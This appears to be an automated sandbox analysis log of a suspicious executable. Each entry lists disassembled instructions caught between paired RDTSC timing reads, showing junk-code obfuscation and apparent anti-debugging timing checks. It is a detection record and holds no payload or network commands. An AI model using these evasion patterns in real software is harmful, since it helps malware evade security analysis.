Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11ADBB7 second address: 11ADC60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE8794FB0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007EFFE8794FB8h 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ebx 0x00000013 call 00007EFFE8794FA8h 0x00000018 pop ebx 0x00000019 mov dword ptr [esp+04h], ebx 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc ebx 0x00000026 push ebx 0x00000027 ret 0x00000028 pop ebx 0x00000029 ret 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push eax 0x0000002f call 00007EFFE8794FA8h 0x00000034 pop eax 0x00000035 mov dword ptr [esp+04h], eax 0x00000039 add dword ptr [esp+04h], 0000001Dh 0x00000041 inc eax 0x00000042 push eax 0x00000043 ret 0x00000044 pop eax 0x00000045 ret 0x00000046 jmp 00007EFFE8794FB7h 0x0000004b push 00000000h 0x0000004d call 00007EFFE8794FB6h 0x00000052 pop ebx 0x00000053 xchg eax, esi 0x00000054 push edi 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 popad 0x00000059 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11B130A second address: 11B1314 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007EFFE92369C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11B1314 second address: 11B1365 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007EFFE8794FA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007EFFE8794FA8h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b mov dword ptr [ebp+122D3600h], esi 0x00000031 push 00000000h 0x00000033 mov dword ptr [ebp+122D17F1h], edi 0x00000039 add dword ptr [ebp+1245A299h], ecx 0x0000003f push eax 0x00000040 je 00007EFFE8794FB4h 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11B1365 second address: 11B1369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11ABE39 second address: 11ABE3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11ACE9D second address: 11ACEAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE92369CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11AEED6 second address: 11AEEDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11AEEDA second address: 11AEEE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11AAE5E second address: 11AAF35 instructions: 0x00000000 rdtsc 0x00000002 jp 00007EFFE8794FA8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007EFFE8794FB9h 0x00000013 jmp 00007EFFE8794FAEh 0x00000018 popad 0x00000019 nop 0x0000001a mov bh, A7h 0x0000001c push dword ptr fs:[00000000h] 0x00000023 push 00000000h 0x00000025 push ebp 0x00000026 call 00007EFFE8794FA8h 0x0000002b pop ebp 0x0000002c mov dword ptr [esp+04h], ebp 0x00000030 add dword ptr [esp+04h], 00000015h 0x00000038 inc ebp 0x00000039 push ebp 0x0000003a ret 0x0000003b pop ebp 0x0000003c ret 0x0000003d stc 0x0000003e mov dword ptr fs:[00000000h], esp 0x00000045 push 00000000h 0x00000047 push eax 0x00000048 call 00007EFFE8794FA8h 0x0000004d pop eax 0x0000004e mov dword ptr [esp+04h], eax 0x00000052 add dword ptr [esp+04h], 00000018h 0x0000005a inc eax 0x0000005b push eax 0x0000005c ret 0x0000005d pop eax 0x0000005e ret 0x0000005f mov bh, C2h 0x00000061 mov eax, dword ptr [ebp+122D1549h] 0x00000067 mov ebx, 4C4EC732h 0x0000006c push FFFFFFFFh 0x0000006e jmp 00007EFFE8794FAFh 0x00000073 jmp 00007EFFE8794FB9h 0x00000078 nop 0x00000079 jc 00007EFFE8794FC4h 0x0000007f push eax 0x00000080 push edx 0x00000081 jmp 00007EFFE8794FB2h 0x00000086 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11AAF35 second address: 11AAF39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11AAF39 second address: 11AAF48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11AAF48 second address: 11AAF4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11B33E1 second address: 11B33E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11AEFA5 second address: 11AEFA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11AEFA9 second address: 11AEFAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11B33E5 second address: 11B33EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11AEFAD second address: 11AEFB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11B33EB second address: 11B33F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007EFFE92369C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11B33F5 second address: 11B33F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11B33F9 second address: 11B3495 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 call 00007EFFE92369D3h 0x0000000e pop ebx 0x0000000f mov edi, 59D01564h 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007EFFE92369C8h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 00000017h 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 call 00007EFFE92369CEh 0x00000035 mov edi, dword ptr [ebp+122D3713h] 0x0000003b pop edi 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push eax 0x00000041 call 00007EFFE92369C8h 0x00000046 pop eax 0x00000047 mov dword ptr [esp+04h], eax 0x0000004b add dword ptr [esp+04h], 00000019h 0x00000053 inc eax 0x00000054 push eax 0x00000055 ret 0x00000056 pop eax 0x00000057 ret 0x00000058 mov di, bx 0x0000005b xchg eax, esi 0x0000005c jmp 00007EFFE92369D2h 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 jnp 00007EFFE92369CCh 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11B3495 second address: 11B3499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11B3499 second address: 11B34A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007EFFE92369C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11B14B4 second address: 11B14B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11B14B8 second address: 11B14BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11B14BE second address: 11B14D5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007EFFE8794FA8h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jo 00007EFFE8794FB0h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11B1584 second address: 11B1588 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11BA64D second address: 11BA653 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11BFB32 second address: 11BFB4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE92369CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007EFFE92369CCh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11BFC91 second address: 11BFC97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11BFC97 second address: 11BFC9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11BFC9B second address: 11BFCD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE8794FB4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jno 00007EFFE8794FB8h 0x00000015 mov eax, dword ptr [eax] 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 114F8B1 second address: 114F8C0 instructions: 0x00000000 rdtsc 0x00000002 jp 00007EFFE92369C6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 114F8C0 second address: 114F8C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11C4D6F second address: 11C4D75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11C52ED second address: 11C52F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11C52F1 second address: 11C530C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007EFFE92369D3h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11C936C second address: 11C9370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11C9370 second address: 11C9383 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE92369CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11C9383 second address: 11C9393 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007EFFE8794FAAh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11C9655 second address: 11C9677 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007EFFE92369C6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007EFFE92369D1h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11C9677 second address: 11C967B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11C967B second address: 11C9685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11C9685 second address: 11C968F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007EFFE8794FA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11C990A second address: 11C992E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jns 00007EFFE92369C6h 0x0000000c popad 0x0000000d jmp 00007EFFE92369D7h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11C992E second address: 11C9938 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007EFFE8794FACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11C9BD3 second address: 11C9BD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11C9BD9 second address: 11C9BDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11C9BDD second address: 11C9BEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jnl 00007EFFE92369C6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11CA15F second address: 11CA175 instructions: 0x00000000 rdtsc 0x00000002 jc 00007EFFE8794FA6h 0x00000008 jmp 00007EFFE8794FACh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11CA2FB second address: 11CA2FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11CA2FF second address: 11CA303 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11CA7DE second address: 11CA7F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE92369D2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11CA7F4 second address: 11CA7FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11C8FE5 second address: 11C8FFB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jg 00007EFFE92369C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f js 00007EFFE92369C6h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11C8FFB second address: 11C901B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007EFFE8794FACh 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c jmp 00007EFFE8794FAEh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11CD789 second address: 11CD795 instructions: 0x00000000 rdtsc 0x00000002 jns 00007EFFE92369C6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11D1A1B second address: 11D1A33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE8794FB4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11D1A33 second address: 11D1A39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11D1A39 second address: 11D1A45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007EFFE8794FA6h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11D0831 second address: 11D084C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFFE92369D5h 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11D084C second address: 11D087C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE8794FACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007EFFE8794FA6h 0x00000011 jmp 00007EFFE8794FB8h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11D087C second address: 11D0880 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1198C51 second address: 1198C5B instructions: 0x00000000 rdtsc 0x00000002 jno 00007EFFE8794FA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1198FFF second address: 1199009 instructions: 0x00000000 rdtsc 0x00000002 jno 00007EFFE92369C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1199009 second address: 119900F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 119900F second address: 1199013 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11991B9 second address: 11991BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1199321 second address: 119932E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push ebx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1199A01 second address: 1199A06 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1199C93 second address: 1199CDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007EFFE92369C8h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D331Fh], ecx 0x0000002d lea eax, dword ptr [ebp+124897DDh] 0x00000033 nop 0x00000034 pushad 0x00000035 push esi 0x00000036 pushad 0x00000037 popad 0x00000038 pop esi 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1199CDA second address: 1199D3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE8794FACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007EFFE8794FB5h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 popad 0x00000015 jno 00007EFFE8794FACh 0x0000001b popad 0x0000001c nop 0x0000001d or dword ptr [ebp+122D1873h], esi 0x00000023 movsx edx, ax 0x00000026 lea eax, dword ptr [ebp+12489799h] 0x0000002c mov dword ptr [ebp+122D3450h], edi 0x00000032 push eax 0x00000033 pushad 0x00000034 jns 00007EFFE8794FACh 0x0000003a pushad 0x0000003b pushad 0x0000003c popad 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11D0B4A second address: 11D0B4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11D0E28 second address: 11D0E2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11D0E2C second address: 11D0E46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007EFFE92369D2h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11D0F91 second address: 11D0F9D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11D0F9D second address: 11D0FA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11D0FA1 second address: 11D0FAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11D6CEB second address: 11D6D23 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007EFFE92369D6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop ecx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jns 00007EFFE92369C6h 0x00000018 pushad 0x00000019 popad 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c popad 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 je 00007EFFE92369C6h 0x00000026 pop edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11D59D3 second address: 11D59E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 jo 00007EFFE8794FA6h 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11D59E3 second address: 11D59ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007EFFE92369C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11D5CA6 second address: 11D5CC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 jmp 00007EFFE8794FAEh 0x0000000b jbe 00007EFFE8794FA6h 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11D5CC1 second address: 11D5CC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
